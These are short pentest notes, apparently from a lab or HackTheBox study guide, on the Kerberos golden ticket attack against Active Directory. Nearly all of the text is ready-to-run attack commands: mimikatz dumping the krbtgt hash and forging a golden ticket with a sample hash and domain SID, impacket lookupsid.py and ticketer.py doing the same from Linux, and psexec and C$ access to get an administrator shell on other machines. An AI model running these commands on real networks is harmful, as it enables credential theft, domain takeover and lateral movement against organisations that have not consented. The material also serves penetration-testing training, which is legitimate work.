.png)
Here we have the hash for kerberos ticket granting ticket with which we can gernerate ktgt.
-
Run mimikatz and
privilege::debug
-
lsadump::lsa /inject /name:krbtgtand copy these 2 into notepad for later use
{% code overflow="wrap" %}
kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-3537832060-1456167142-1983014419 /krbtgt:b72f4a5ed9bef0f6a0ec3d4b5a4e4320 /id:500 /ptt
{% endcode %}
- user can be anything
- rid is 500 for admin
- ptt means pass the ticket
- We can access other computers on network
dir \\THEPUNISHER\c$
psexec.exe \\THEPUNISHER cmd.exeto get a shell
- Since we have the krbtgt we can do a golden ticket attack:
krbtgt:819af826bb148e603acb0f33d17632f8 - We need domain-sid so using powersploit: Powershell:
Get-DomainSID -Domain htb.local
Linux:
lookupsid.py CORP/[email protected]
Now using this info with impacket ticketer to get the golden ticket:
ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local user
Putting the ticket in our environment variable:
export KRB5CCNAME=DoesNotExist.ccache
Note: before psexec check if dns and time is configured properly
psexec.py -debug htb.local/administrator@forest -k -no-pass